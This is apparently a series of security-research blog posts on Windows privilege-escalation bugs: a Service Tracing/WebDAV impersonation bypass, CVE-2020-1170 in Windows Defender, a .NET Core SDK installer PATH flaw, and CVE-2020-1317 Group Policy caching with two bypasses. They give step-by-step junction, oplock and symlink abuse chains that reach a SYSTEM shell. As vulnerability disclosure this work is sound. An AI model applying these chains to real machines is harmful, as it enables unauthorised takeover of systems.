In the screenshot below, you can see that if CreateDirectory succeeds, i.e. if the target directory didn’t exist and was successfully created, the function immediately returns. In that case, the log file is never opened and you’d have to disable the tracing and re-enable it. In other words, for the TraceCreateClientFile function to complete, this CreateDirectory call must fail.

The first HTTP request we receive on our WebDAV server is actually the result of this initial check. Moreover, CreateDirectory is nothing more than a user-friendly wrapper for the NtCreateFile function. Yes, everything is a file, even on Windows! :upside_down_face:

This CreateDirectory function is very convenient but there is a problem: it doesn’t allow you to specify custom flags, such as the ones used to restrict the impersonation level of the token. This explains why I was able to get a proper impersonation token using this trick.

BOOL CreateDirectoryW(
  LPCWSTR               lpPathName,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
);

Does it mean that I was lucky? What would happen if the server actually requested /tracing/RASMAN.LOG via the hardened CreateFile function call? To answer this question, I compiled the following code:

HANDLE hFile = CreateFile(
    argv[1],
    GENERIC_READ | GENERIC_WRITE,
    0,
    NULL,
    OPEN_EXISTING,
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, // <- Limited token
    NULL);
if (hFile != INVALID_HANDLE_VALUE) // CreateFile returns INVALID_HANDLE_VALUE on failure, not NULL
{
    wprintf(L"CreateFile OK\n");
    CloseHandle(hFile);
}
else
{
    PrintLastErrorAsText(L"CreateFile"); // helper function from the PoC
}

Then, instead of waiting for the RASMAN service to connect, I manually triggered the WebDAV access using this dummy application as a low-privileged user. And… here is the result:

Although the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are specified in the CreateFile call, we still get a token with the impersonation level SecurityImpersonation! In conclusion, yes, I was a bit lucky, but it’s not just luck: as it turns out, the WebClient service is also flawed.

Conclusion

In this post, I explained how it is possible to easily bypass a security patch that was originally implemented to prevent a malicious server application from getting a usable impersonation token through the Service Tracing feature. I have to give part of the credit to this MS16-075 exploit, written by a colleague of mine a couple of years ago; it served as a great inspiration.

I don’t know yet if I’ll publish this as a tool or not. There is still some work to do in order to make it a usable tool because of the many Service Tracing keys that can be triggered. Moreover, there is still a major prerequisite for this trick to work: the WebClient service must be installed and enabled. Although this is the default on Workstations, it’s not the case for Servers. On a server, you would need to install/enable the WebDAV component as an additional feature.

Lastly, I didn’t take the time to push the investigation further. There is a lot more work to do to understand why the request coming from the WebClient service doesn’t take the SECURITY_IDENTIFICATION flag of the CreateFile call into consideration. In my opinion, this is a vulnerability but, who cares? :pensive:

Links & Resources

CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability

Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender. Finding a vulnerability in a security-oriented product is quite satisfying. Though, there was nothing groundbreaking. It’s quite the opposite actually and I’m surprised nobody else reported it before me.

Introduction

Before diving into the technical details of this vulnerability, I want to say a quick word about the timeline. I initially reported this vulnerability through the Zero Day Initiative (ZDI) program around 8 months ago. After sending them my report, I received a reply stating that they weren’t interested in purchasing this vulnerability. At the time, I had only a few weeks of experience in Windows security research so I kind of relied on their judgement and left this finding aside. I even completely forgot about it in the following months.

Five months later, in late March 2020, I eventually went through my notes again and saw this report but, this time, my mindset was different. I had gained some experience because of a few other reports that I had sent to Microsoft directly. So, I knew that it was potentially eligible and I decided to spend a bit more time on it. It was a good decision because I even found a better way of triggering the vulnerability. I reported it to Microsoft in early April and it was acknowledged a few weeks later.

The Initial Thought Process

In the advisory published by Microsoft, you can read:

An elevation of privilege vulnerability exists in Windows Defender that leads to arbitrary file deletion on the system.

As usual, the description is quite generic. You’ll see that there is more to it than just an “arbitrary file deletion”.

The issue I found is related to the way Windows Defender log files are handled. In case you don’t know, Windows Defender uses two log files - MpCmdRun.log and MpSigStub.log - both located in C:\Windows\Temp. This directory is the default temp folder of the SYSTEM account, but it’s also a folder where every user has Write access.

Although that may sound bad, it isn’t, because the permissions of the files are properly set (obviously?). By default, Administrators and SYSTEM have Full Control over these files, whereas normal users can’t even read them.

Here is an extract from a sample log file. As you can see, it is used to log events such as Signature Updates, but you can also find some entries related to Antivirus scans.

Signature updates are done automatically on a regular basis, but they can also be triggered manually, for example using the Update-MpSignature PowerShell command, which doesn’t require any particular privileges. Therefore, these updates can be triggered as a normal user, as shown in the screenshot below.

During the process, we can see that some information is being written to C:\Windows\Temp\MpCmdRun.log by Windows Defender (as NT AUTHORITY\SYSTEM).

What this means is that, as a low-privileged user, we can trigger a log file write operation by a process running as NT AUTHORITY\SYSTEM. However, we don’t have access to the file and we can’t control its content. We don’t even have Write access on the Temp folder itself, so we wouldn’t be able to set it as a mount point either. I can’t think of a more useless attack vector right now. :laughing:

Though, following my experience with CVE-2020-0668 (again…) - A Trivial Privilege Escalation Bug in Windows Service Tracing - I knew that there was potentially more to it than just a log file write.

Think about it for a second: each time a Signature Update is performed (which happens quite often), a new entry is added to the file, representing around 1 KB. That’s not much, right? But how much would it represent after several months or even years? In such cases, log rotation mechanisms are often implemented so that old logs are compressed, archived or simply deleted. So, I wondered whether such a mechanism was also implemented to handle the MpCmdRun.log file. If so, there is probably some room for a privileged file operation abuse…

Searching for a Log Rotation Mechanism

In order to find a potential log rotation mechanism, I began by reversing the MpCmdRun.exe executable itself. After opening the file in IDA, the very first thing I did was search for occurrences of the MpCmdRun string. My initial objective was to see how the log file was handled. Looking at the Strings window is usually a good way to start.

Not surprisingly, the first result was MpCmdRun.log. Though, another very interesting result came out of this search: MpCmdRun_MaxLogSize. I was looking for a log rotation mechanism and this string was clearly the equivalent of “Follow the white rabbit”. Obviously, I took the red pill and went down the rabbit hole. :sunglasses:

Looking at the Xrefs of MpCmdRun_MaxLogSize, I found that it was used in only one function: MpCommonConfigGetValue().

The MpCommonConfigGetValue() function itself is called from MpCommonConfigLookupDword().

Finally, MpCommonConfigLookupDword() is called from the CLogHandle::Flush() method.

The following part of CLogHandle::Flush() is particularly interesting because it’s responsible for writing to the log file.

First, we can see that GetFileSizeEx() is called on hObject (1), which is a handle pointing to the log file (MpCmdRun.log) at this point. The result of this function is returned in FileSize, which is a LARGE_INTEGER structure.

typedef union _LARGE_INTEGER {
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } DUMMYSTRUCTNAME;
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } u;
  LONGLONG QuadPart;
} LARGE_INTEGER;
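To make the union concrete, here is a small sketch of how the same 64 bits are viewed either as QuadPart or as the LowPart/HighPart pair (assuming the little-endian layout of x86/x64):

```python
import struct

def large_integer_parts(quad: int):
    """Reinterpret a 64-bit QuadPart as (LowPart, HighPart), i.e. an
    unsigned DWORD and a signed LONG, as the LARGE_INTEGER union does."""
    raw = struct.pack("<q", quad)          # 8 bytes, little-endian
    low = struct.unpack("<I", raw[:4])[0]  # DWORD LowPart
    high = struct.unpack("<i", raw[4:])[0] # LONG HighPart
    return low, high

print(large_integer_parts(0x1000000))  # (16777216, 0): 16 MB fits entirely in LowPart
```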

Since MpCmdRun.exe is a 64-bit executable here, QuadPart is used to get the file size as a LONGLONG directly. This value is stored in v11 and is then compared against the value returned by MpCommonConfigLookupDword() (2). If the file size is greater than this value, the PurgeLog() function is called.

So, before going any further, we need to get the value returned by MpCommonConfigLookupDword(). To do so, the easiest way I found was to put a breakpoint right after this function call and get the result from the RAX register.

Here is what it looks like once the breakpoint is hit:

Therefore, we now know that the maximum file size is 0x1000000, i.e. 16,777,216 bytes (16MB).

The next logical question would then be: what happens when the log file size exceeds this value? As we saw earlier, when the size of the log file exceeds 16MB, the PurgeLog() function is called. Based on the name, we may assume that we will probably find the answer to this second question inside this function.

When this function is called, a new filename is first prepared by concatenating the original filename and .bak. Then, the original file is moved, which means that MpCmdRun.log is renamed as MpCmdRun.log.bak. Now we have our answer: a log rotation mechanism is indeed implemented.
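Based on this, the rotation logic can be summarized with a small sketch (a reconstruction of the observed behavior, not the actual Defender code):

```python
import os

MAX_LOG_SIZE = 0x1000000  # 16 MB threshold read via MpCommonConfigLookupDword()

def purge_log(path: str) -> bool:
    """If the log exceeds the maximum size, move it to '<path>.bak' so a
    fresh log can be created; an existing .bak *file* gets overwritten."""
    if os.path.getsize(path) <= MAX_LOG_SIZE:
        return False
    os.replace(path, path + ".bak")
    return True
```

Note that os.replace would simply fail if the .bak target were a directory; what the real implementation does in that case is the interesting part.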

Here, I could have continued the reverse engineering process but I had something else in mind. With this knowledge, I wanted to adopt a simpler approach: check the behavior of this mechanism under various conditions and observe the result using Procmon.

The Vulnerability

Here is what we know and what we have learnt so far:

  • Windows Defender writes some log events to C:\Windows\Temp\MpCmdRun.log (e.g.: Signature Updates).
  • Any user can create files and directories in C:\Windows\Temp\.
  • A log rotation mechanism prevents the log file from exceeding 16MB by moving it to C:\Windows\Temp\MpCmdRun.log.bak and creating a new one.

Do you see where I’m going here? Can you spot the potential issue? What would happen if there was already something named MpCmdRun.log.bak in C:\Windows\Temp\? :thinking:

To answer this question, I considered the following test protocol:

  1. Create something called MpCmdRun.log.bak in C:\Windows\Temp\.
  2. Fill C:\Windows\Temp\MpCmdRun.log with arbitrary data so that its size is close to 16MB.
  3. Trigger a Signature Update
  4. Observe the result with Procmon
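Steps 1 and 2 are easy to script. The sketch below reproduces them in a sandbox directory (on the real target, base_dir would be C:\Windows\Temp; triggering the update and observing the result still require PowerShell and Procmon):

```python
import os

def prepare_log_rotation_test(base_dir: str):
    """Step 1: create MpCmdRun.log.bak as a directory, with some content
    to check whether a later deletion is recursive.
    Step 2: fill MpCmdRun.log so its size is close to the 16 MB limit."""
    bak = os.path.join(base_dir, "MpCmdRun.log.bak")
    os.makedirs(os.path.join(bak, "subdir"), exist_ok=True)
    with open(os.path.join(bak, "subdir", "dummy.txt"), "w") as f:
        f.write("will Defender delete me?")
    log = os.path.join(base_dir, "MpCmdRun.log")
    with open(log, "wb") as f:
        f.write(b"A" * 16_777_002)  # a couple hundred bytes below 0x1000000
    return bak, log
```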

If MpCmdRun.log.bak is an existing file, it is simply overwritten. We may assume that this is the intended behavior, so this test isn’t very conclusive. The very first test case that came to my mind instead was: what if MpCmdRun.log.bak is a directory?

If MpCmdRun.log.bak isn’t a simple file, we may assume that it cannot simply be overwritten. So, my initial assumption was that the log rotation would just fail: instead of being backed up, the original log file would simply be overwritten. However, the behavior I observed with Procmon was far more interesting than that. Defender actually deleted the directory and then proceeded with the normal log rotation. So, I decided to redo this test but, this time, I also created files and directories inside C:\Windows\Temp\MpCmdRun.log.bak\. It turns out that the deletion was actually recursive!

That’s interesting! Now, the question is: can we redirect this file operation with a junction?

Here is the initial setup for this test case:

  • A dummy target directory is created: C:\ZZ_SANDBOX\target.
  • MpCmdRun.log.bak is created as a directory and is set as a mountpoint to this directory.
  • The MpCmdRun.log file is filled with 16,777,002 bytes of arbitrary data.

The target directory of the mountpoint contains a folder and a file.

And here is what I observed in Procmon after executing the Update-MpSignature PowerShell command:

Defender followed the mountpoint, deleted each file and folder recursively, and finally deleted the folder C:\Windows\Temp\MpCmdRun.log.bak\ itself. Nice! This means that, as a normal user, we can trick this service into deleting any file or folder we want on the filesystem…

Exploitability

As we saw in the previous part, exploitation is quite straightforward. The only thing we would have to do is create the directory C:\Windows\Temp\MpCmdRun.log.bak\ and set it as a mountpoint to another location on the filesystem.

Note: actually it’s not that simple because an additional trick is required if we want to perform a targeted file or directory deletion but I won’t discuss this here.

We face one practical issue though: how long would it take to fill the log file until its size exceeds 16MB? That’s quite a high value for a simple log file. Therefore, I ran several tests and measured the time required by each command. Then, I extrapolated the results to estimate the overall time it would take. It should be noted that the Update-MpSignature command cannot be run multiple times in parallel (which makes sense for an update process).

Test #1

As a first test, I chose a naive approach. I ran the Update-MpSignature command a hundred times and measured the overall time it took.

Here is the result of this first test. With this technique, it would take more than 22 hours to fill the file and trigger the vulnerability if we ran the Update-MpSignature command in a loop.

DESCRIPTION | TIME | FILE SIZE | # OF CALLS
Raw data for 100 calls | 650s (10m 50s) | 136,230 bytes | 100
Estimated time to reach the target file size | 80,050s (22h 14m 10s) | 16,777,216 bytes | 12,316

That’s not very practical, to say the least.

Test #2

After test #1, I checked the documentation of the Update-MpSignature command to see if it could be tweaked in order to speed up the entire process. This command has a very limited set of options but one of them caught my eye.

This command accepts an UpdateSource as a parameter, which is actually an enumeration as we can see on the previous screenshot. When using most of the available values, an error message is immediately returned and nothing is written to the log file so they would be useless for this exploit scenario.

Though, when using the InternalDefinitionUpdateServer value, I observed an interesting result.

Since my VM is a standalone installation of Windows, it isn’t configured to use an “internal server” for the updates. Instead, they are received directly from MS servers, hence the error message.

The main benefit of this method is that the error message is returned almost instantly but the event is still written to the log file, which makes it a very good candidate for the exploit in this particular scenario.

Therefore, I ran this command a hundred times as well and observed the result.

This time, the 100 calls took less than 4 seconds to complete. This wasn’t enough to calculate relevant statistics, so I ran the same test with 10,000 calls.

Here is the result of this second test.

DESCRIPTION | TIME | FILE SIZE | # OF CALLS
Raw data for 10,000 calls | 363s (6m 3s) | 2,441,120 bytes | 10,000
Estimated time to reach the target file size | 2,495s (41m 35s) | 16,777,216 bytes | 68,728

With this slight adjustment, the overall operation would take around 40 minutes, instead of more than 22 hours with the previous command: a drastic reduction of the time required to fill the log file. It should also be noted that these values correspond to the worst-case scenario, in which the log file is initially empty.
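Both estimates are simple proportionality; the sketch below reproduces the numbers from the two tables above:

```python
import math

TARGET_SIZE = 0x1000000  # 16,777,216 bytes

def extrapolate(measured_time_s: float, measured_bytes: int, measured_calls: int):
    """Scale a measured sample up to the 16 MB target: estimated number
    of calls needed and estimated total time in seconds."""
    calls = math.ceil(TARGET_SIZE / (measured_bytes / measured_calls))
    time_s = round(TARGET_SIZE * measured_time_s / measured_bytes)
    return calls, time_s

print(extrapolate(650, 136_230, 100))      # Test #1 -> (12316, 80050)
print(extrapolate(363, 2_441_120, 10_000)) # Test #2 -> (68728, 2495)
```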

I considered that this value was acceptable so I implemented this trick in a Proof-of-Concept. Here is a screenshot showing the result.

Starting from an empty log file, the PoC took around 38 minutes to complete, which is very close to the estimation I had made previously.

As a side note, if you paid attention to the last screenshot, you probably noticed that I specified C:\ProgramData\Microsoft\Windows\WER as the target directory to delete. I didn’t choose this path randomly. I chose this one because, once this folder has been removed, you can get code execution as NT AUTHORITY\SYSTEM as explained by @jonaslyk in this post: From directory deletion to SYSTEM shell.

Conclusion

This is probably the last blog post in which I write about this kind of privileged file operation abuse. In an email sent to all vulnerability researchers, Microsoft announced that they changed the scope of their bounty program. Therefore, such exploits are no longer eligible. This decision is justified by the fact that a generic patch is in development and will address this entire bug class.

I have to say that this decision sounds a bit premature. It would be understandable if this patch were already implemented in the latest Insider Preview build of Windows 10, but that’s not the case. I would assume that this is more of an economic decision than a purely technical matter, as such a bounty program probably represents a cost of hundreds of thousands of dollars per month.

Links & Resources

Windows .Net Core SDK Elevation of Privilege

There was a weird bug in the DotNet Core Toolset installer that allowed any local user to elevate their privileges to SYSTEM. In this blog post, I want to share the details of this bug that was silently (but only partially) fixed despite not being acknowledged as a vulnerability by Microsoft.

Introduction

In March 2020, jonaslyk told me about a weird bug he had encountered on his personal computer. The PATH environment variable of the SYSTEM account was populated with a path that was seemingly related to DotNet. The weird thing was that this path pointed to a non-admin user’s folder. So, I checked on my own machine; there was a DotNet-related path as well, but it pointed to a local admin’s folder. Anyway, if the path of a user-owned folder can be appended to this environment variable, it means code execution as SYSTEM. So, we decided to work together on this strange case and see what we could come up with.

The Initial Setup

We started with a clean and fully updated installation of Windows 10. In this initial state, here is the default value of the SYSTEM account’s PATH environment variable. As a reminder, S-1-5-18 is the Security Identifier (SID) of the LocalSystem account.

reg query "HKU\S-1-5-18\Environment" /v Path

Then we installed Visual Studio Community 2019 (link). Once installed, we selected the .Net desktop development component in the Installer.

After clicking the “Install” button, the packages are downloaded and installed.

We are looking for a registry key modification so we can use Process Monitor to easily monitor what’s going on in the background.

Things get interesting when the “.Net Core toolset” is installed. We can see a RegSetValue operation originating from an executable called dotnet.exe on HKU\.DEFAULT\Environment\PATH. After this event, we can see that the PATH value in HKU\S-1-5-18\Environment is indeed different.

We may notice two potential issues here:

  1. The variable %USERPROFILE% is resolved to the current user’s home folder instead of the SYSTEM account’s home folder.
  2. Another path, once again pointing to a user-owned folder, is appended to the SYSTEM account’s PATH.

In these two cases, the current user is a local administrator so the consequences of such modifications are somewhat limited. Though, they shouldn’t occur because they may have unintended side effects (e.g.: UAC bypass).

After reading this, you might have a feeling of déjà vu. If so, it means that you probably stumbled upon this post by @RedVuln at some point: .Net System Persistence / bypassuac / Privesc. It looks like he found this bug at almost the same time Jonas and I were working on it. But there is a problem: all of this can be achieved only as an administrator, because the installation of the DotNet SDK requires such privileges. Or does it?

The Actual Privilege Escalation Vulnerability

In the previous part, we saw that the installation process of the .Net SDK had some potentially unintended consequences on the Path Environment variable of the SYSTEM account. Though, strictly speaking, this doesn’t lead to an Elevation of Privilege.

But, what if I told you that the exact same behavior could be reproduced while being logged in as a normal user with no admin rights?

When Visual Studio is installed, several MSI files seem to be copied to the C:\Windows\Installer folder. Since we observed that the RegSetValue operation originated from an executable called dotnet.exe, we can try to search for this string in these files. Here is what we get using the findstr command.

cd "C:\Windows\Installer"
findstr /I /M "dotnet.exe" "*.msi"

Great! We have two matches. What we can do next is try to run each of these files as a normal user with the command msiexec /qn /a <FILE> and observe the result on the SYSTEM account’s Environment Path variable in the registry.

Running the first MSI file, we don’t see anything. However, running the second MSI file, we observe the exact same operation which initially occurred when we installed the DotNet SDK as an administrator.

This time though, because the MSI file was run by the user lab-user, the path C:\Users\lab-user\.dotnet\tools is appended to the SYSTEM account’s PATH environment variable. As a result, this user can now get code execution as SYSTEM by planting a DLL and waiting for a service to load it. This can be achieved - on Windows 10 - by hijacking the WptsExtensions.dll DLL which is loaded by the Task Scheduler service upon startup, as described by @RedVuln in his post.

Root Cause Analysis

The exploitation of this bug is trivial so I will focus on the root cause analysis instead, which turned out to be quite interesting for me.

The question is: where do we start? Well, let’s start at the beginning… :slightly_smiling_face:

We have a Process Monitor dump file that contains the RegSetValue event we are interested in. That’s a good starting point. Let’s see what we can learn from the Stack Trace.

We can see that the dotnet.exe executable loads several DLLs and then loads several .Net assemblies.

Looking at the details of the Process Start operation, we can see the following command line:

"C:\Program Files\dotnet\\dotnet.exe" exec "C:\Program Files\dotnet\\sdk\3.1.200\dotnet.dll" internal-reportinstallsuccess ""

From this command line, we may assume that the Win32 dotnet.exe executable is actually a wrapper for the dotnet.dll assembly, which is loaded with the following arguments: internal-reportinstallsuccess "".

Therefore, reversing this assembly should provide us with all the answers we are looking for:

  1. How does the executable evaluate the .Net Core tools path?
  2. How does the executable add the path to the SYSTEM account’s PATH in the registry?

To inspect this assembly, I used dnSpy. It’s definitely the best tool I’ve used so far for this kind of task.

The Program’s Main starts by calling Program.ProcessArgs().

Several things happen in this function but the most important part is framed in red in the screenshot below.

Indeed, the function with the name ConfigureDotNetForFirstTimeUse() looks like a good candidate to continue the investigation.

This assumption is confirmed when looking at the content of the function because we are starting to see some references to the “Environment Path”.

The method CreateEnvironmentPath() creates an instance of an object implementing the IEnvironmentProvider interface, depending on the underlying Operating System. Thus, it would be a new WindowsEnvironmentPath object here.

The object is instantiated based on a dynamically generated path, which is formed by the concatenation of some string and "tools".

This DotnetUserProfileFolderPath string itself is the concatenation of some other string and ".dotnet".

The DotnetHomePath string is generated based on the value of an Environment variable.

The name of the variable depends on PlateformHomeVariableName, which would be "USERPROFILE" here because the OS is Windows.

To conclude this first part of the analysis, we know that the DotNet tools’ path follows the scheme <ENV.USERPROFILE>\.dotnet\tools, where the value of ENV.USERPROFILE is returned by Environment.GetEnvironmentVariable(). So far, this is consistent with what we observed with Process Monitor, so we must be on the right track.

If we check the documentation of Environment.GetEnvironmentVariable(), we can read that, by default, the value is retrieved from the current process if an EnvironmentVariableTarget isn’t specified.

Now, if we take another look at the details of the Process Start operation in Process Monitor, we can see that the process uses the current user’s environment, although it’s running as NT AUTHORITY\SYSTEM. Therefore, the final tools path is resolved to C:\Users\lab-user\.dotnet\tools.
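The root cause can be condensed into a few lines. The sketch below (hypothetical helper name, not the actual SDK code) rebuilds the tools path from the process environment, exactly like Environment.GetEnvironmentVariable() does by default:

```python
import os

def dotnet_tools_path(environ=None):
    """Rebuild <ENV.USERPROFILE>\\.dotnet\\tools from the *process*
    environment. When the installer runs elevated as SYSTEM, this
    environment block is inherited from the installing user, hence
    the path resolves to that user's profile."""
    environ = os.environ if environ is None else environ
    return "\\".join([environ["USERPROFILE"], ".dotnet", "tools"])

print(dotnet_tools_path({"USERPROFILE": r"C:\Users\lab-user"}))
# -> C:\Users\lab-user\.dotnet\tools
```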

We now know how the path is determined so we have the answer to our first question. We now need to find out how this path is handled afterwards.

To answer the second question, we may go back to the Program.ConfigureDotNetForFirstTimeUse() method and see what’s executed after the CreateEnvironmentPath() function call.

Once the tools path has been determined, a new DotnetFirstTimeUseConfigurer object is created and the Configure() method is immediately called. At this point, the path information is stored in the EnvironmentPath object identified by the pathAdder variable.

In this method, the most relevant piece of code is framed in red in the screenshot below, where the AddPackageExecutablePath() method is invoked.

This method is very simple. The AddPackageExecutablePathToUserPath() method is called on the EnvironmentPath object.

The content of the AddPackageExecutablePathToUserPath() method finally gives us the answer to our second question.

First, this method retrieves the value of the PATH environment variable but, this time, it uses a slightly different way to do so. It invokes GetEnvironmentVariable with an additional EnvironmentVariableTarget parameter, which is set to 1.

From the documentation, we can read that if this parameter is set to 1, the value is retrieved from the HKEY_CURRENT_USER\Environment registry key. The current user being NT AUTHORITY\SYSTEM here, the value is retrieved from HKU\S-1-5-18\Environment.

The problem is that this applies to the SetEnvironmentVariable() method as well. Therefore, C:\Users\lab-user\.dotnet\tools\ is appended to the Path Environment variable of the LOCAL SYSTEM account in the registry.

As a conclusion, the .Net Core toolset path is created based on the current user’s environment but is applied to the LOCAL SYSTEM account in the registry because the process is running as NT AUTHORITY\SYSTEM, hence the vulnerability.

Conclusion

The status of this vulnerability is quite unclear. Since it wasn’t officially acknowledged by Microsoft, there is no CVE ID associated to this finding. Though, as mentioned in the introduction, it has partially been fixed. Namely, the C:\Users\<USER>\.dotnet\tools path is no longer appended to the Path if you use one of the latest .NET Core installers.

Now, what can you do to make sure your machine isn’t affected by this vulnerability?

First, check the following value in the registry.

C:\Windows\System32>reg query HKU\S-1-5-18\Environment /v Path

HKEY_USERS\S-1-5-18\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;

If you see something that is different from what is shown above, you may restore the default value using the following command as an administrator:

C:\Windows\System32>reg ADD HKU\S-1-5-18\Environment /v Path /d "%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;" /F
The operation completed successfully.

Then, you can update Visual Studio or the .Net SDK and check the registry once again. The “tools” folder should no longer be present.

Unfortunately, according to my latest tests, the %USERPROFILE% variable still gets resolved to the current user’s “home” folder. This means that the Path is still altered when installing the .Net SDK. Thankfully, this one cannot be exploited for local privilege escalation because the corresponding folder is owned by an administrator.

Links & Resources

Abusing Group Policy Caching

In this post I will show you how I discovered a severe vulnerability in the so-called “Group Policy Caching”, which was fixed (among other GP vulnerabilities) in CVE-2020-1317.

A standard domain user can perform an arbitrary file overwrite with SYSTEM privileges via the “gpsvc” service, by altering the behavior of “Group Policy Caching”.

Cool, isn’t it?

The “Group Policy caching” feature has been configurable since Windows 8/Server 2012; you can learn more about it here: https://specopssoft.com/blog/things-work-group-policy-caching/

For our goal, all you need is a domain user and at least the “Default Domain” policy; no special configuration and no special “Group Policy Caching” settings are needed. Only default configurations 😉

The “Group Policy caching” files are stored under the following subfolder:

  • C:\users\<domain_user>\AppData\Local\GroupPolicy\datastore\0

Each time a standard domain user performs a “gpupdate /force”, the directory is created (if it doesn’t exist) and then populated depending on the group policies that are applied.

The domain user has full control over the “Datastore” directory but only read access under the “0” subfolder.

This can easily be overridden: we just rename the “Datastore” folder and create a new “Datastore” folder with a “0” subfolder.

Now let’s create a file in the “0” folder:

and then run a “gpupdate /force” watching what happens in procmon:

As we can see, the file is opened without impersonation (as SYSTEM) and two SetSecurity calls are made. The resulting permissions on the test file are:

Very strange: we lost full control over the file, probably because of the second SetSecurity call. But what about the first one?

Let’s move a step forward, now we create a junction under the “0” folder pointing to a protected directory, for example: “c:\users\administrator\documents”

Note: we obviously need to rename the current “Datastore” folder and create a new one with the “0” subfolder, given that we once again only have read access.

Again, in procmon let’s see what happens with a new “gpupdate /force”

A first SetSecurity call is made on “desktop.ini”, and then the processing stops due to an access denied error on “MyMusic”.

What will be the resulting perms on “desktop.ini”? Guess what: full control for our user!

Now we have a clear vision of the whole picture:

When Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access.

Being able to obtain full control over a SYSTEM-protected file (during the first SetSecurity call), EoP should be super easy, don’t you agree?

For example, we can alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in my post: https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/

To achieve my goal, I created a very simple POC, here the relevant parts:

When the target file is accessed, an “opportunistic lock” is set; afterwards, the junction is switched to “\RPC Control”, which stops the processing and prevents the second SetSecurity call.

Our domain user now has full control over the file!

Microsoft fixed this security “bug” by simply moving the “Group Policy” folders under c:\programdata\microsoft\grouppolicy\users\<sid>, which is read-only for standard users…

That’s all 🙂


When ntuser.pol leads you to SYSTEM

This is a super short writeup following my previous post. My last sentence was a kind of provocation, because I already knew that there were at least two “bypasses” for CVE-2020-1317.

I did not submit them because I totally disagree with recent MSRC changes in their policies, so when I discovered that they were fixed with the latest security updates, I decided to share my findings.

So here we are, this is the first one (next to come hopefully soon). I won’t dig too much into the details. Let’s start from Group Policy Caching again. This “feature” is enabled by default on clients but can be turned off; on Windows Server it’s disabled by default.

When GP Caching is disabled, a new privilege escalation is possible (more on this later). If certain policies are configured, the file “ntuser.pol” is written to c:\programdata\microsoft\grouppolicy\users\<sid>.

The domain user has Full Control (!) over this directory and over ntuser.pol too. The file has hidden and system attributes, but we can of course remove them.

Let’s see what happens with procmon..

This is interesting!

The file ntuser.pol is renamed to tempntuser.pol by the group policy service running as SYSTEM. Got it? At the end “tempntuser.pol” is deleted:

So we can obviously perform an “arbitrary delete” by abusing our beloved symlinks via “\RPC Control”, but the rename operation also permits us to write a file (with filename and contents under our control) with SYSTEM privileges, and that’s a real EoP! We also need to inhibit the file deletion; otherwise, our file won’t exist any more at the end of the process.

The procedure is rather simple; I think this simple batch file is more than sufficient 🙂

“test.dll” is our “source” file, which we place in a directory where we have full control, because during move operations the file retains its source ACL.

The “poc.exe” simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)

And at the very end we have our file written in System32 with full control over it!!

But why do we have full control under the <SID> directory? Well, what I observed is that when Group Policy Caching is enabled, a “Datastore” sub-directory is created and correct permissions are then set (see also my previous post).

That’s all 😉

When a stupid oplock leads you to SYSTEM

As promised in my previous post, I’m going to show you the second method I found in order to circumvent CVE-2020-1317.

Prerequisites

  1. A domain user has access to a domain-joined Windows machine.
  2. The domain user must be able to create a subdirectory under “Datastore\0”, which is theoretically no longer possible. But as we will see, there are at least two methods to bypass this limitation.

First Method: “Domain Group Policy” abuse

We will implement a Domain User Group Policy which produces “files”, typically script files such as Logon/Logoff scripts or configuration preferences XML files. This is a very common scenario in enterprise AD domains.

Steps to reproduce

  • In this case we are going to configure user preferences under “User Configuration\Preferences\Windows Settings” in Group Policy Management. But it’s just an example; logon/logoff scripts will work too.
  • On the Domain Controller create a Domain preferences policy (for example “Ini Files”)

  • Login with domain user credentials on a domain joined computer
  • Check if the “Group Policy Cache” has been saved under the directory:
    • C:\programdata\microsoft\GrouPolicy\users\<SID>\Datastore (the entire directory, subdirectories and files are read-only for users after CVE-2020-1317)
    • If not, perform a “gpupdate /force” via command prompt
  • We can observe that the preference “inifiles.xml” has been created  
  • Now we will place an exclusive “oplock” [1] on this file:

  • On a new command prompt, we will force a new “gpupdate /force”. Oplock will be triggered and policy processing hangs:
  • Here comes the fun part(!). When Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” always grants “Full Control” to the current user, the second one only read access. This is the first run, so we should have full control over the “Datastore” folders. In a new command prompt, we will try to create a directory under the “Datastore\0” folder:
  • Once created, we disable inheritance and remove the permissions for SYSTEM and the Administrators group. Why? Because when we release the “oplock”, the “second run” will occur, during which the domain user would be granted read-only access. Given that the process is running as SYSTEM, this operation will now be denied. This can be observed in the following procmon screenshot:
  • Now we have a directory with full control where we can place a symlink via \RPC Control to a SYSTEM-protected file… and, just as an example, alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in previous blog posts [3]

Second Method: redirect Windows Error Processing “ReportQueue” directory

In this case we are going to redirect the “C:\ProgramData\Microsoft\Windows\WER\ReportQueue” folder to the “Datastore\0” directory. This folder is normally empty if no error reporting process is running.

Steps to reproduce

  • Create the junction. In this case we are using CreateMountPoint.exe [3]; we could also use the built-in “mklink /j” command, but we would need to remove the directory beforehand.

  • Ensure that optional diagnostic data has been turned on in Settings->Privacy->Diagnostics & feedback
  • Launch “Feedback Hub” and report a problem. Remember to check “Save a local copy…”
  • You will observe that the redirected “ReportQueue” directory will be populated. As soon as this happens, perform a “gpupdate /force”
  • Once the update has finished, you will be able to create a directory under the “Datastore\0” folder. At this point, you can proceed with the same technique explained before.

Conclusions:

I think I have successfully demonstrated that even after the CVE-2020-1317 bug fix, there were still several possibilities to abuse junctions and SetSecurity calls in the Group Policy client in order to perform an elevation of privilege starting from a low-privileged domain user.

That’s all 😉

Hands off my service account!

